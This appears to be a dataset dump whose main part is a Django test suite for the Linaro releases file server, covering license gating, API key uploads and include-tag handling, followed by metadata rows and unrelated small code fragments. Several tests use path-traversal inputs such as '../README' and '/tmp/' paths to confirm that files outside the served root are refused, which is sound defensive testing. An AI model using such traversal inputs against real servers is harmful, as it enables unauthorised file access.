file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_dir_containing_only_dirs(self):
target_file = "~linaro-android"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertContains(
response,
r"<th></th><th>Name</th><th>Last modified</th>"
"<th>Size</th><th>License</th>")
def test_not_found_file(self):
target_file = "12qwaszx"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(response, "not found", status_code=404)
def test_unprotected_BUILD_INFO(self):
target_file = 'build-info/panda-open.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_redirect_to_file_on_accept_multi_license(self):
target_file = "build-info/multi-license.txt"
digest = self.set_up_license(target_file)
# Accept the first license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(
response['Location'], listing_url + "?dl=/" + target_file)
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
digest = self.set_up_license(target_file, 1)
# Accept the second license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name1 = "license_accepted_" + digest
self.assertTrue(accept_cookie_name1 in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(
response['Location'], listing_url + "?dl=/" + target_file)
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
client.cookies[accept_cookie_name1] = accept_cookie_name1
response = client.get(url)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_header_html(self):
target_file = "~linaro-android"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(
response, r"Welcome to the Linaro releases server")
def test_exception_internal_host_for_lic(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/origen-blob.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_exception_internal_host_for_openid(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/openid.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_exception_internal_host_for_lic_and_openid(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/origen-blob-openid.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_no_exception_ip(self):
internal_host = '10.1.2.3'
target_file = 'build-info/origen-blob.txt'
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_broken_build_info_directory(self):
target_file = "build-info/broken-build-info"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file is invalid, we don't allow access
self.assertEqual(response.status_code, 403)
def test_broken_build_info_file(self):
target_file = "build-info/broken-build-info/test.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file is invalid, we don't allow access
self.assertEqual(response.status_code, 403)
def test_unable_to_download_hidden_files(self):
target_file = '~linaro-android/staging-vexpress-a9/OPEN-EULA.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# This file exists, but isn't listed so we shouldn't be able to
# download it.
self.assertEqual(response.status_code, 404)
def test_partial_build_info_file_open(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_open.txt")
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file specifies this file is open
self.assertEqual(response.status_code, 200)
def test_partial_build_info_file_protected(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_protected.txt")
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
def test_partial_build_info_file_unspecified(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_inaccessible.txt")
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file has no information about this file
self.assertEqual(response.status_code, 403)
def test_listings_do_not_contain_double_slash_in_link(self):
target_file = 'images/'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# this link should not contain a double slash:
self.assertNotContains(response, "//origen-blob.txt")
def test_directory_with_broken_symlink(self):
target_file = 'broken-symlinks'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# this test should not cause an exception. Anything else is a pass.
self.assertEqual(response.status_code, 200)
def test_sizeof_fmt(self):
self.assertEqual(_sizeof_fmt(1), '1')
self.assertEqual(_sizeof_fmt(1234), '1.2K')
self.assertEqual(_sizeof_fmt(1234567), '1.2M')
self.assertEqual(_sizeof_fmt(1234567899), '1.1G')
self.assertEqual(_sizeof_fmt(1234567899999), '1.1T')
def test_listdir(self):
patterns = [
(['b', 'a', 'latest', 'c'], ['latest', 'a', 'b', 'c']),
(['10', '1', '100', 'latest'], ['latest', '1', '10', '100']),
(['10', 'foo', '100', 'latest'], ['latest', '10', '100', 'foo']),
]
for files, expected in patterns:
path = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, path)
for file in files:
with open(os.path.join(path, file), 'w') as f:
f.write(file)
self.assertEqual(expected, views._listdir(path))
def test_whitelisted_dirs(self):
target_file = "precise/restricted/whitelisted.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def make_temporary_file(self, data, root=None):
"""Creates a temporary file and fills it with data.
Returns the file name of the new temporary file.
"""
tmp_file_handle, tmp_filename = tempfile.mkstemp(dir=root)
tmp_file = os.fdopen(tmp_file_handle, "w")
tmp_file.write(data)
tmp_file.close()
self.addCleanup(os.unlink, tmp_filename)
return os.path.basename(tmp_filename)
def test_replace_self_closing_tag(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_self_closing_tag1(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README"/> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_with_closing_tag(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README">README is missing'
'</linaro:include> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_non_existent_file(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="NON_EXISTENT_FILE" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_empty_file_property(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="../README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_subdir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="subdir/README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_subdir_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="subdir/../README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_full_path(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
tmp = self.make_temporary_file("Included from /tmp", root="/tmp")
ret = _process_include_tags(
'Test <linaro:include file="/tmp/%s" /> html' % tmp)
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_self_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="./README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_self_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="./../README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_symlink(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="READMELINK" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_process_include_tags(self):
target_file = "readme"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(response, r"Included from README")
def test_is_same_parent_dir_true(self):
fname = os.path.join(TESTSERVER_ROOT, "subdir/../file")
self.assertTrue(is_same_parent_dir(TESTSERVER_ROOT, fname))
def test_is_same_parent_dir_false(self):
fname = os.path.join(TESTSERVER_ROOT, "../file")
self.assertFalse(is_same_parent_dir(TESTSERVER_ROOT, fname))
def test_get_remote_static_unsupported_file(self):
response = self.client.get('/get-remote-static?name=unsupported.css')
self.assertEqual(response.status_code, 404)
def test_get_remote_static_nonexisting_file(self):
pages = {"/": "index"}
with TestHttpServer(pages) as http_server:
css_url = '%s/init.css' % http_server.base_url
settings.SUPPORTED_REMOTE_STATIC_FILES = {
'init.css': css_url}
self.assertRaises(urllib2.HTTPError, self.client.get,
'/get-remote-static?name=init.css')
def test_get_remote_static(self):
pages = {"/": "index", "/init.css": "test CSS"}
with TestHttpServer(pages) as http_server:
css_url = '%s/init.css' % http_server.base_url
settings.SUPPORTED_REMOTE_STATIC_FILES = {
'init.css': css_url}
response = self.client.get('/get-remote-static?name=init.css')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'test CSS')
def test_path_to_root(self):
response = self.client.get("http://testserver//", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_path_to_dir_above(self):
response = self.client.get("http://testserver/../", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_path_to_dir_above2(self):
response = self.client.get("http://testserver/..", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_get_key(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
def test_get_key_api_disabled(self):
settings.MASTER_API_KEY = ""
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 403)
def test_get_key_post_and_get_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
key = response.content
last_used = APIKeyStore.objects.get(key=key).last_used
# Now write a file so we can upload it
file_content = "test_get_key_post_and_get_file"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
try:
# Send the file
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
settings.UPLOAD_PATH, key, "file_name")
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file if we present the key
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertEqual(response.status_code, 200)
response = self.client.get("http://testserver/file_name")
self.assertNotEqual(response.status_code, 200)
self.assertNotEqual(
APIKeyStore.objects.get(key=key).last_used, last_used)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.UPLOAD_PATH, key))
def test_get_public_key_post_and_get_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY,
"public": ""})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
key = response.content
# Now write a file so we can upload it
file_content = "test_get_key_post_and_get_file"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
buildinfo_content = "\n".join([
"Format-Version: 0.1",
"Files-Pattern: *",
"Build-Name: test",
"License-Type: open"])
tmp_build_info = os.path.join(
file_root,
self.make_temporary_file(buildinfo_content))
try:
# Send the files
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/pub/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
with open(tmp_build_info) as f:
response = self.client.post(
"http://testserver/pub/BUILD-INFO.txt",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
settings.SERVED_PATHS[0], 'pub/file_name')
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file
response = self.client.get("http://testserver/pub/file_name")
self.assertEqual(response.status_code, 200)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.SERVED_PATHS[0], "pub"))
def test_post_empty_file(self):
'''Ensure we accept zero byte files'''
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
key = response.content
# Now write a file so we can upload it
file_content = ""
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
try:
# Send the file
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
settings.UPLOAD_PATH, key, "file_name")
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file if we present the key
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertEqual(response.status_code, 200)
response = self.client.get("http://testserver/file_name")
self.assertNotEqual(response.status_code, 200)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.UPLOAD_PATH, key))
def test_post_no_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
key = response.content
response = self.client.post(
"http://testserver/file_name", data={"key": key})
self.assertEqual(response.status_code, 500)
def test_post_file_no_key(self):
file_content = "test_post_file_no_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
# Try to upload a file without a key.
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"file": f})
self.assertEqual(response.status_code, 500)
# Make sure the file didn't get created.
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, "file_name")))
def test_post_file_random_key(self):
key = "%030x" % random.randrange(256 ** 15)
file_content = "test_post_file_random_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
# Try to upload a file with a randomly generated key.
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"key": key, "file": f})
self.assertEqual(response.status_code, 500)
# Make sure the file didn't get created.
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, key, "file_name")))
def test_api_delete_key(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
self.assertRegexpMatches(response.content, "\S+")
key = response.content
file_content = "test_api_delete_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
self.assertTrue(os.path.isfile(os.path.join(settings.UPLOAD_PATH,
key,
"file_name")))
# Release the key, the files should be deleted
response = self.client.get("http://testserver/api/delete_key",
data={"key": key})
self.assertEqual(response.status_code, 200)
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, key, "file_name")))
# Key shouldn't work after released
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertNotEqual(response.status_code, 200)
class HowtoViewTests(BaseServeViewTest):
def test_no_howtos(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'build.tar.bz2')
def test_howtos_without_license(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test")
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'build.tar.bz2')
def test_howtos_with_license_in_buildinfo(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test",
with_buildinfo=True)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'howto')
def test_howtos_with_license_in_openeula(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test",
with_buildinfo=False)
serve_root.make_file(
"build/9/howto/OPEN-EULA.txt", with_buildinfo=False)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'howto')
def test_howtos_howto_dir(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_releasenotes.txt", data=".h1 HowTo Test")
response = self.client.get('/build/9/howto/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'HowTo Test')
def test_howtos_product_dir(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/target/product/panda/howto/HOWTO_releasenotes.txt",
data=".h1 HowTo Test")
response = self.client.get('/build/9/target/product/panda/howto/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'HowTo Test')
class FileViewTests(BaseServeViewTest):
def test_static_file(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file("MD5SUM")
serve_root.make_file(
"BUILD-INFO.txt",
data=("Format-Version: 2.0\n\n"
"Files-Pattern: MD5SUM\n"
"License-Type: open\n"))
response = self.client.get('/MD5SUM')
self.assertEqual(response.status_code, 200)
class ViewHelpersTests(BaseServeViewTest):
def test_auth_group_error(self):
groups = ["linaro", "batman", "catwoman", "joker"]
request = mock.Mock()
request.path = "mock_path"
response = views.group_auth_failed_response(request, groups)
self.assertIsNotNone(response)
self.assertTrue(isinstance(response, HttpResponse))
self.assertContains(
response,
"You need to be the member of one of the linaro batman, catwoman "
"or joker groups",
status_code=403)
if __name__ == '__main__':
unittest.main()
| 41.756158
| 79
| 0.632887
| 6,305
| 50,859
| 4.906423
| 0.074544
| 0.048489
| 0.045967
| 0.045482
| 0.82738
| 0.805269
| 0.776241
| 0.753451
| 0.733603
| 0.715533
| 0
| 0.010426
| 0.260721
| 50,859
| 1,217
| 80
| 41.790468
| 0.812335
| 0.110738
| 0
| 0.655568
| 0
| 0
| 0.14177
| 0.050555
| 0
| 0
| 0
| 0
| 0.198622
| 1
| 0.101033
| false
| 0
| 0.026406
| 0
| 0.135476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c84f491e3f5f59f24f8adc43bd18fa95d8b8c039
| 145
|
py
|
Python
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 13
|
2015-01-07T19:39:02.000Z
|
2021-07-12T21:09:28.000Z
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 9
|
2015-06-14T11:37:26.000Z
|
2020-12-11T09:12:30.000Z
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 10
|
2015-05-28T05:51:46.000Z
|
2021-12-29T20:36:15.000Z
|
# -*- coding: utf-8 -*-
from httoop.codecs.text.html import HTML
from httoop.codecs.text.plain import PlainText
__all__ = ['PlainText', 'HTML']
| 24.166667
| 46
| 0.717241
| 20
| 145
| 5
| 0.6
| 0.2
| 0.32
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.124138
| 145
| 5
| 47
| 29
| 0.779528
| 0.144828
| 0
| 0
| 0
| 0
| 0.106557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c0d240dacd684717edd018a2ddf32401d5f425b4
| 144
|
py
|
Python
|
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
'''
Author: mukangt
Date: 2021-08-04 11:06:49
LastEditors: mukangt
LastEditTime: 2021-08-04 11:07:43
Description:
'''
from . import Rc_resource
| 18
| 33
| 0.743056
| 23
| 144
| 4.608696
| 0.782609
| 0.113208
| 0.150943
| 0.188679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.220472
| 0.118056
| 144
| 8
| 34
| 18
| 0.614173
| 0.756944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
2385120ba9e5809dcd4a2f0a8d0ec50a70b4042a
| 212
|
py
|
Python
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 2
|
2020-08-20T21:00:53.000Z
|
2021-08-16T15:28:51.000Z
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 3
|
2020-09-24T06:50:43.000Z
|
2020-12-15T11:02:04.000Z
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 1
|
2020-08-20T21:00:59.000Z
|
2020-08-20T21:00:59.000Z
|
class reslice():
def __init__(self, image=[[0.0]], order=[0]):
import numpy as np
self.image = np.transpose(image, order)
def image(self: 'array_float'):
return self.image
| 26.5
| 50
| 0.580189
| 28
| 212
| 4.214286
| 0.571429
| 0.228814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.278302
| 212
| 7
| 51
| 30.285714
| 0.751634
| 0
| 0
| 0
| 0
| 0
| 0.053659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
23f65cddf985d129e187de5ca1332ed6001bf2d3
| 16
|
py
|
Python
|
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
# 返回与VI关联的对称条件熵。
| 16
| 16
| 0.8125
| 1
| 16
| 13
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 16
| 1
| 16
| 16
| 0.866667
| 0.875
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9b03e7dc344f57ee90b10e57ca66f05b0b984232
| 448
|
py
|
Python
|
test_frame/other_tests/test_import_time.py
|
DJMIN/funboost
|
7570ca2909bb0b44a1080f5f98aa96c86d3da9d4
|
[
"Apache-2.0"
] | 333
|
2019-08-08T10:25:27.000Z
|
2022-03-30T07:32:04.000Z
|
test_frame/other_tests/test_import_time.py
|
